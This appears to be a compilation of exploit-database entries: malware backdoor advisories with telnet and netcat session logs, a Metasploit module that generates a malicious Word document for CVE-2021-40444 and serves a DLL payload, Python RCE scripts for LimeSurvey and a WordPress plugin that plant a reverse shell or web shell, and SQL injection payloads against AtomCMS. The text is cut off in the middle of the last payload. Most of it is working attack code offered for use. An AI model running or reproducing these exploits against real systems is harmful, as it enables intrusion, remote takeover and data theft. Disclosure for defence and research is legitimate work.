<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/434923afc32a7bc7355ed9a5224b9273.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Freddy.2001<br />Vulnerability: Authentication Bypass Command Execution<br />Description: The malware listens on TCP port 19535. Third-party intruders who can reach an infected host can gain access using an empty password and run commands made available by the backdoor using TELNET.<br />Type: PE32<br />MD5: 434923afc32a7bc7355ed9a5224b9273<br />Vuln ID: MVID-2022-0486<br />Dropped files: sycon2.exe<br />Disclosure: 02/08/2022<br /><br />Exploit/PoC:<br />#Note: use TELNET<br /><br />telnet.exe x.x.x.x 19535<br /><br />Enter password:<br /><br />User: Victim <br />Computer net name: DESKTOP-2C3JQHO<br />IP address: 192.168.18.129<br />Local date & time: 2/3/2022 2:45:46 AM<br />Hackers connected: 2<br />$y(0n v.2.3.2 by Meerkat Systems | NLG<br />Sycon><br />Sycon> windows <br />Window 6976: dump <br />Window 6976: tmp <br />Window 1956: Administrator: Administrator Command Prompt <br />Window 6976: Program Manager <br />Sycon> cd \ <br />CD: C:\ <br />Sycon> dir <br />Found: $Recycle.Bin <br />Found: Boot <br />Found: bootmgr <br />Found: BOOTNXT <br />etc...<br />Sycon> exec calc <br />Executing... <br />Sycon> logoff <br />Windows is going down... <br />I'm killed! <br />Sycon><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Microsoft Office Word Malicious MSHTML RCE',<br /> 'Description' => %q{<br /> This module creates a malicious docx file that when opened in Word on a vulnerable Windows<br /> system will lead to code execution. This vulnerability exists because an attacker can<br /> craft a malicious ActiveX control to be used by a Microsoft Office document that hosts<br /> the browser rendering engine.<br /> },<br /> 'References' => [<br /> ['CVE', '2021-40444'],<br /> ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'],<br /> ['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'],<br /> ['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'],<br /> ['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'],<br /> ['URL', 'https://github.com/klezVirus/CVE-2021-40444']<br /> ],<br /> 'Author' => [<br /> 'lockedbyte ', # Vulnerability discovery.<br /> 'klezVirus ', # References and PoC.<br /> 'thesunRider', # Official Metasploit module.<br /> 'mekhalleh (RAMELLA Sébastien)' # Zeop-CyberSecurity - code base contribution and refactoring.<br /> ],<br /> 'DisclosureDate' => '2021-09-23',<br /> 'License' => MSF_LICENSE,<br /> 'Privileged' => false,<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_X64],<br /> 'Payload' => {<br /> 'DisableNops' => true<br /> },<br /> 'DefaultOptions' => {<br /> 'FILENAME' => 'msf.docx'<br /> },<br /> 'Targets' => [<br /> [<br /> 'Hosted', {}<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [UNRELIABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])<br /> ])<br /> register_advanced_options([<br /> OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]),<br /> ])<br /> end<br /><br /> def bin_to_hex(bstr)<br /> return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join)<br /> end<br /><br /> def cab_checksum(data, seed = "\x00\x00\x00\x00")<br /> checksum = seed<br /><br /> bytes = ''<br /> data.chars.each_slice(4).map(&:join).each do |dword|<br /> if dword.length == 4<br /> checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*')<br /> else<br /> bytes = dword<br /> end<br /> end<br /> checksum = checksum.reverse<br /><br /> case (data.length % 4)<br /> when 3<br /> dword = "\x00#{bytes}"<br /> when 2<br /> dword = "\x00\x00#{bytes}"<br /> when 1<br /> dword = "\x00\x00\x00#{bytes}"<br /> else<br /> dword = "\x00\x00\x00\x00"<br /> end<br /><br /> checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse<br /> end<br /><br /> # http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf<br /> def create_cab(data)<br /> cab_cfdata = ''<br /> filename = "../#{File.basename(@my_resources.first)}.inf"<br /> block_size = 32768<br /> struct_cffile = 0xd<br /> struct_cfheader = 0x30<br /><br /> block_counter = 0<br /> data.chars.each_slice(block_size).map(&:join).each do |block|<br /> block_counter += 1<br /><br /> seed = "#{[block.length].pack('S')}#{[block.length].pack('S')}"<br /> csum = cab_checksum(block, seed)<br /><br /> vprint_status("Data block added w/ checksum: #{bin_to_hex(csum)}")<br /> cab_cfdata << csum # uint32 {4} - Checksum<br /> cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length<br /> cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length<br /> cab_cfdata << block<br /> end<br /><br /> cab_size = [<br /> struct_cfheader +<br /> struct_cffile +<br /> filename.length +<br /> cab_cfdata.length<br /> ].pack('L<')<br /><br /> # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)<br /> cab_header = "\x4D\x53\x43\x46" # uint32 {4} - Header (MSCF)<br /> cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null)<br /> cab_header << cab_size # uint32 {4} - Archive Length<br /> cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null)<br /><br /> cab_header << "\x2C\x00\x00\x00" # uint32 {4} - Offset to the first CFFILE<br /> cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null)<br /> cab_header << "\x03" # byte {1} - Minor Version (3)<br /> cab_header << "\x01" # byte {1} - Major Version (1)<br /> cab_header << "\x01\x00" # uint16 {2} - Number of Folders<br /> cab_header << "\x01\x00" # uint16 {2} - Number of Files<br /> cab_header << "\x00\x00" # uint16 {2} - Flags<br /><br /> cab_header << "\xD2\x04" # uint16 {2} - Cabinet Set ID Number<br /> cab_header << "\x00\x00" # uint16 {2} - Sequential Number of this Cabinet file in a Set<br /><br /> # CFFOLDER<br /> cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder<br /> struct_cfheader +<br /> struct_cffile +<br /> filename.length<br /> ].pack('L<')<br /> cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder<br /> cab_header << "\x00\x00" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)<br /><br /> # increase file size to trigger vulnerability<br /> cab_header << [ # uint32 {4} - Uncompressed File Length ("\x02\x00\x5C\x41")<br /> data.length + 1073741824<br /> ].pack('L<')<br /><br /> # set current date and time in the format of cab file<br /> date_time = Time.new<br /> date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')<br /> time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')<br /><br /> # CFFILE<br /> cab_header << "\x00\x00\x00\x00" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)<br /> cab_header << "\x00\x00" # uint16 {2} - Folder ID (starts at 0)<br /> cab_header << date # uint16 {2} - File Date (\x5A\x53)<br /> cab_header << time # uint16 {2} - File Time (\xC3\x5C)<br /> cab_header << "\x20\x00" # uint16 {2} - File Attributes<br /> cab_header << filename # byte {X} - Filename (ASCII)<br /> cab_header << "\x00" # byte {1} - null Filename Terminator<br /><br /> cab_stream = cab_header<br /><br /> # CFDATA<br /> cab_stream << cab_cfdata<br /> end<br /><br /> def generate_html<br /> uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab"<br /> inf = "#{File.basename(@my_resources.first)}.inf"<br /><br /> file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')<br /> js_content = ::File.binread(file_path)<br /><br /> js_content.gsub!('REPLACE_INF', inf)<br /> js_content.gsub!('REPLACE_URI', uri)<br /> if datastore['OBFUSCATE']<br /> print_status('Obfuscate JavaScript content')<br /><br /> js_content = Rex::Exploitation::JSObfu.new js_content<br /> js_content = js_content.obfuscate(memory_sensitive: false)<br /> end<br /><br /> html = '<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>'<br /> html += js_content.to_s<br /> html += '</script></body></html>'<br /> html<br /> end<br /><br /> def get_file_in_docx(fname)<br /> i = @docx.find_index { |item| item[:fname] == fname }<br /><br /> unless i<br /> fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")<br /> end<br /><br /> @docx.fetch(i)[:data]<br /> end<br /><br /> def get_template_path<br /> datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx')<br /> end<br /><br /> def inject_docx<br /> document_xml = get_file_in_docx('word/document.xml')<br /> unless document_xml<br /> fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')<br /> end<br /><br /> document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')<br /> unless document_xml_rels<br /> fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')<br /> end<br /><br /> uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"<br /> @docx.each do |entry|<br /> case entry[:fname]<br /> when 'word/document.xml'<br /> entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s)<br /> when 'word/_rels/document.xml.rels'<br /> entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', "mhtml:#{uri}!x-usc:#{uri}")<br /> end<br /> end<br /> end<br /><br /> def normalize_uri(*strs)<br /> new_str = strs * '/'<br /><br /> new_str = new_str.gsub!('//', '/') while new_str.index('//')<br /><br /> # makes sure there's a starting slash<br /> unless new_str[0, 1] == '/'<br /> new_str = '/' + new_str<br /> end<br /><br /> new_str<br /> end<br /><br /> def on_request_uri(cli, request)<br /> header_cab = {<br /> 'Access-Control-Allow-Origin' => '*',<br /> 'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',<br /> 'Cache-Control' => 'no-store, no-cache, must-revalidate',<br /> 'Content-Type' => 'application/octet-stream',<br /> 'Content-Disposition' => "attachment; filename=#{File.basename(@my_resources.first)}.cab"<br /> }<br /><br /> header_html = {<br /> 'Access-Control-Allow-Origin' => '*',<br /> 'Access-Control-Allow-Methods' => 'GET, POST',<br /> 'Cache-Control' => 'no-store, no-cache, must-revalidate',<br /> 'Content-Type' => 'text/html; charset=UTF-8'<br /> }<br /><br /> if request.method.eql? 'HEAD'<br /> if request.raw_uri.to_s.end_with? '.cab'<br /> send_response(cli, '', header_cab)<br /> else<br /> send_response(cli, '', header_html)<br /> end<br /> elsif request.method.eql? 'OPTIONS'<br /> response = create_response(501, 'Unsupported Method')<br /> response['Content-Type'] = 'text/html'<br /> response.body = ''<br /><br /> cli.send_response(response)<br /> elsif request.raw_uri.to_s.end_with? '.html'<br /> print_status('Sending HTML Payload')<br /><br /> send_response_html(cli, generate_html, header_html)<br /> elsif request.raw_uri.to_s.end_with? '.cab'<br /> print_status('Sending CAB Payload')<br /><br /> send_response(cli, create_cab(@dll_payload), header_cab)<br /> end<br /> end<br /><br /> def pack_docx<br /> @docx.each do |entry|<br /> if entry[:data].is_a?(Nokogiri::XML::Document)<br /> entry[:data] = entry[:data].to_s<br /> end<br /> end<br /><br /> Msf::Util::EXE.to_zip(@docx)<br /> end<br /><br /> def unpack_docx(template_path)<br /> document = []<br /><br /> Zip::File.open(template_path) do |entries|<br /> entries.each do |entry|<br /> if entry.name.match(/\.xml|\.rels$/i)<br /> content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?<br /> elsif entry.file?<br /> content = entry.get_input_stream.read<br /> end<br /><br /> vprint_status("Parsing item from template: #{entry.name}")<br /><br /> document << { fname: entry.name, data: content }<br /> end<br /> end<br /><br /> document<br /> end<br /><br /> def primer<br /> print_status('CVE-2021-40444: Generate a malicious docx file')<br /><br /> @proto = (datastore['SSL'] ? 'https' : 'http')<br /> if datastore['SRVHOST'] == '0.0.0.0'<br /> datastore['SRVHOST'] = Rex::Socket.source_address<br /> end<br /><br /> template_path = get_template_path<br /> unless File.extname(template_path).match(/\.docx$/i)<br /> fail_with(Failure::BadConfig, 'Template is not a docx file!')<br /> end<br /><br /> print_status("Using template '#{template_path}'")<br /> @docx = unpack_docx(template_path)<br /><br /> print_status('Injecting payload in docx document')<br /> inject_docx<br /><br /> print_status("Finalizing docx '#{datastore['FILENAME']}'")<br /> file_create(pack_docx)<br /><br /> @dll_payload = Msf::Util::EXE.to_win64pe_dll(<br /> framework,<br /> payload.encoded,<br /> {<br /> arch: payload.arch.first,<br /> mixed_mode: true,<br /> platform: 'win'<br /> }<br /> )<br /> end<br />end<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/29bc048d58ab8038c7001ef0d5e69c9b.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Prexot.a<br />Vulnerability: Authentication Bypass<br />Description: The malware listens on random high TCP ports e.g 11404, 19545, 17001, 10110. Third-party attackers who can reach an infected system can logon using any username/password combination.<br />Type: PE32<br />MD5: 29bc048d58ab8038c7001ef0d5e69c9b<br />Vuln ID: MVID-2022-0484<br />Dropped files: services.exe, mstempf.exe<br />Disclosure: 02/08/2022<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 10110<br />220 Bot Server (Win32)<br />USER malvuln<br />331 Password required.<br />PASS hate<br />230 Login successful. Have fun.<br />SYST<br />215 UNIX Type: L8<br />1PASV<br />227 Entering Passive Mode<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)<br /># Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login<br /># Date: 05/12/2021<br /># Exploit Author: Y1LD1R1M<br /># Vendor Homepage: https://www.limesurvey.org/<br /># Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip<br /># Version: 5.2.x<br /># Tested on: Kali Linux 2021.3<br /># Reference: https://github.com/Y1LD1R1M-1337/Limesurvey-RCE<br /><br />#!/usr/bin/python<br /># -*- coding: utf-8 -*-<br /><br /><br />import requests<br />import sys<br />import warnings<br />from bs4 import BeautifulSoup<br /><br />warnings.filterwarnings("ignore", category=UserWarning, module='bs4')<br />print("_______________LimeSurvey RCE_______________")<br />print("")<br />print("")<br />print("Usage: python exploit.py URL username password port")<br />print("Example: python exploit.py http://192.26.26.128 admin password 80")<br />print("")<br />print("")<br />print("== ██╗ ██╗ ██╗██╗ ██████╗ ██╗██████╗ ██╗███╗ ███╗ ==")<br />print("== ╚██╗ ██╔╝███║██║ ██╔══██╗███║██╔══██╗███║████╗ ████║ ==")<br />print("== ╚████╔╝ ╚██║██║ ██║ ██║╚██║██████╔╝╚██║██╔████╔██║ ==")<br />print("== ╚██╔╝ ██║██║ ██║ ██║ ██║██╔══██╗ ██║██║╚██╔╝██║ ==")<br />print("== ██║ ██║███████╗██████╔╝ ██║██║ ██║ ██║██║ ╚═╝ ██║ ==")<br />print("== ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ==")<br />print("")<br />print("")<br />url = sys.argv[1]<br />username = sys.argv[2]<br />password = sys.argv[3]<br />port = sys.argv[4]<br /><br />req = requests.session()<br />print("[+] Retrieving CSRF token...")<br />loginPage = req.get(url+"/index.php/admin/authentication/sa/login")<br />response = loginPage.text<br />s = BeautifulSoup(response, 'html.parser')<br />CSRF_token = s.findAll('input')[0].get("value")<br />print(CSRF_token)<br />print("[+] Sending Login Request...")<br /><br />login_creds = {<br /> "user": username,<br /> "password": password,<br /> "authMethod": "Authdb",<br /> "loginlang":"default",<br /> "action":"login",<br /> "width":"1581",<br /> "login_submit": "login",<br /> "YII_CSRF_TOKEN": CSRF_token<br />}<br />print("[+]Login Successful")<br />print("")<br />print("[+] Upload Plugin Request...")<br />print("[+] Retrieving CSRF token...")<br />filehandle = open("/root/limesurvey/plugin/Y1LD1R1M.zip",mode = "rb") # CHANGE THIS<br />login = req.post(url+"/index.php/admin/authentication/sa/login" ,data=login_creds)<br />UploadPage = req.get(url+"/index.php/admin/pluginmanager/sa/index")<br />response = UploadPage.text<br />s = BeautifulSoup(response, 'html.parser')<br />CSRF_token2 = s.findAll('input')[0].get("value")<br />print(CSRF_token2)<br />Upload_creds = {<br /> "YII_CSRF_TOKEN":CSRF_token2,<br /> "lid":"$lid",<br /> "action": "templateupload"<br />}<br />file_upload= req.post(url+"/index.php/admin/pluginmanager?sa=upload",files = {'the_file':filehandle},data=Upload_creds)<br />UploadPage = req.get(url+"/index.php/admin/pluginmanager?sa=uploadConfirm")<br />response = UploadPage.text<br />print("[+] Plugin Uploaded Successfully")<br />print("")<br />print("[+] Install Plugin Request...")<br />print("[+] Retrieving CSRF token...")<br /><br />InstallPage = req.get(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin")<br />response = InstallPage.text<br />s = BeautifulSoup(response, 'html.parser')<br />CSRF_token3 = s.findAll('input')[0].get("value")<br />print(CSRF_token3)<br />Install_creds = {<br /> "YII_CSRF_TOKEN":CSRF_token3,<br /> "isUpdate": "false"<br />}<br />file_install= req.post(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin",data=Install_creds)<br />print("[+] Plugin Installed Successfully")<br />print("")<br />print("[+] Activate Plugin Request...")<br />print("[+] Retrieving CSRF token...")<br />ActivatePage = req.get(url+"/index.php/admin/pluginmanager?sa=activate")<br />response = ActivatePage.text<br />s = BeautifulSoup(response, 'html.parser')<br />CSRF_token4 = s.findAll('input')[0].get("value")<br />print(CSRF_token4)<br />Activate_creds = {<br /> "YII_CSRF_TOKEN":CSRF_token4,<br /> "pluginId": "1" # CHANGE THIS<br />}<br />file_activate= req.post(url+"/index.php/admin/pluginmanager?sa=activate",data=Activate_creds) <br />print("[+] Plugin Activated Successfully")<br />print("")<br />print("[+] Reverse Shell Starting, Check Your Connection :)")<br />shell= req.get(url+"/upload/plugins/Y1LD1R1M/php-rev.php") # CHANGE THIS<br /> <br /></code></pre>
<pre><code># Exploit Title: AtomCMS v2.0 - SQLi<br /># Date: 08/02/2022<br /># Exploit Author: Luca Cuzzolin aka czz78<br /># Vendor Homepage: https://github.com/thedigicraft/Atom.CMS<br /># Version: v2.0<br /># Category: Webapps<br /># Tested on: Debian linux<br /># CVE : CVE-2022-24223<br /><br /><br />====================================================<br /><br /># PoC : SQLi :<br /><br />http://127.0.0.1/Atom.CMS/admin/login.php<br /><br /><br />POST /Atom.CMS/admin/login.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101<br />Firefox/91.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: it,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 35<br />Origin: http://127.0.0.1<br />Connection: keep-alive<br />Referer: http://127.0.0.1/Atom.CMS/admin/login.php<br />Cookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />email=test%40test.com&password=1234<br /><br /><br />Vulnerable Payload :<br /><br />Parameter: email (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=test@test.com' AND (SELECT 5613 FROM<br />(SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234<br /> Vector: AND (SELECT [RANDNUM] FROM<br />(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 6 columns<br /> Payload: email=test@test.com' UNION ALL SELECT<br />NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL--<br />-&password=1234<br /> Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- -<br />---<br /><br /><br /><br />====================================================<br /><br /></code></pre>
<pre><code># Exploit Title: TestLink 1.19 - Arbitrary File Download (Unauthenticated)<br /># Google Dork: inurl:/testlink/<br /># Date: 07/12/2021<br /># Exploit Author: Gonzalo Villegas (Cl34r)<br /># Exploit Author Homepage: https://nch.ninja<br /># Vendor Homepage: https://testlink.org/<br /># Version:1.16 <= 1.19<br /># CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N<br /><br />You can download files from "/lib/attachments/attachmentdownload.php", passing directly in URL the id of file listed on database, otherwise you can iterate the id parameter (from 1)<br /><br />Vulnerable URL: "http://HOST/lib/attachments/attachmentdownload.php?id=ITERATE_THIS_ID&skipCheck=1"<br /><br />for research notes:<br />https://nch.ninja/blog/unauthorized-file-download-attached-files-testlink-116-119/<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/55822613e0d0f437f3ebe5c7f4155452.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wdoor.11<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: Wdoor by F-king listens on TCP port 80. Third-party attackers who can reach the system can run any OS commands hijacking the infected host.<br />Type: PE32<br />MD5: 55822613e0d0f437f3ebe5c7f4155452<br />Vuln ID: MVID-2022-0483<br />Disclosure: 02/08/2022<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 80<br />Get Shell ok!<br /><br />Get host error! SocketMicrosoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\Users\Victim\Desktop>whoami<br />whoami<br />desktop-2c3iqho\victim<br /><br />C:\Users\Victim\Desktop>net user HYP3RLINX 666 /add<br />net user HYP3RLINX 666 /add<br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated)<br /># Date 07.12.2021<br /># Exploit Author: Ron Jost (Hacker5preme)<br /># Vendor Homepage: https://wordpress.org/plugins/catch-themes-demo-import/<br /># Software Link: https://downloads.wordpress.org/plugin/catch-themes-demo-import.1.6.1.zip<br /># Version: <= 1.6.1<br /># Tested on: Ubuntu 18.04<br /># CVE: CVE-2021-39352<br /># CWE: CWE-434<br /># Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39352/README.md<br /><br /><br />'''<br />Description:<br />The Catch Themes Demo Import WordPress plugin is vulnerable to arbitrary file uploads via the import functionality<br />found in the ~/inc/CatchThemesDemoImport.php file, in versions up to 1.7,<br />due to insufficient file type validation. This makes it possible for an attacker with administrative privileges to upload<br />malicious files that can be used to achieve remote code execution.<br />'''<br /><br /># Banner:<br />banner = """<br /> ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ <br />||C |||V |||E |||- |||2 |||0 |||2 |||1 |||- |||3 |||9 |||3 |||5 |||2 ||<br />||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||<br />|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|<br /><br /> [+] Catch Themes Demo Import RCE (Authenticated) <br /> [@] Developed by Ron Jost (Hacker5preme)<br /> <br />"""<br />print(banner)<br /><br /><br />import argparse<br />import requests<br />from datetime import datetime<br /><br /># User-Input:<br />my_parser = argparse.ArgumentParser(description='Wordpress Plugin Catch Themes Demo Import - RCE (Authenticated)')<br />my_parser.add_argument('-T', '--IP', type=str)<br />my_parser.add_argument('-P', '--PORT', type=str)<br />my_parser.add_argument('-U', '--PATH', type=str)<br />my_parser.add_argument('-u', '--USERNAME', type=str)<br />my_parser.add_argument('-p', '--PASSWORD', type=str)<br />args = my_parser.parse_args()<br />target_ip = args.IP<br />target_port = args.PORT<br />wp_path = args.PATH<br />username = args.USERNAME<br />password = args.PASSWORD<br />print('')<br />print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))<br />print('')<br /><br /># Authentication:<br />session = requests.Session()<br />auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'<br />check = session.get(auth_url)<br /># Header:<br />header = {<br /> 'Host': target_ip,<br /> 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br /> 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Origin': 'http://' + target_ip,<br /> 'Connection': 'close',<br /> 'Upgrade-Insecure-Requests': '1'<br />}<br /><br /># Body:<br />body = {<br /> 'log': username,<br /> 'pwd': password,<br /> 'wp-submit': 'Log In',<br /> 'testcookie': '1'<br />}<br />auth = session.post(auth_url, headers=header, data=body)<br /><br /># Get Security nonce value:<br />check = session.get('http://' + target_ip + ':' + target_port + wp_path+ 'wp-admin/themes.php?page=catch-themes-demo-import').text<br />nonce = check[check.find('ajax_nonce"') + 13:]<br />wp_nonce = nonce[:nonce.find('"')]<br />print(wp_nonce)<br /><br /># Exploit:<br />exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'<br /><br /># Header (Exploit):<br />header = {<br /> "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0",<br /> "Accept": "*/*",<br /> "Accept-Language": "de,en-US;q=0.7,en;q=0.3",<br /> "Accept-Encoding": "gzip, deflate",<br /> 'Referer': 'http://' + target_ip + '/wordpress/wp-admin/themes.php?page=catch-themes-demo-import',<br /> "X-Requested-With": "XMLHttpRequest",<br /> "Content-Type": "multipart/form-data; boundary=---------------------------121585879226594965303252407916",<br /> "Origin": "http://" + target_ip,<br /> "Connection": "close"<br />}<br /><br /># Exploit Payload (Using p0wny shell: https://github.com/flozz/p0wny-shell):<br />shell_payload = "-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nctdi_import_demo_data\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n" + wp_nonce + "\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"selected\"\r\n\r\nundefined\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"content_file\"; 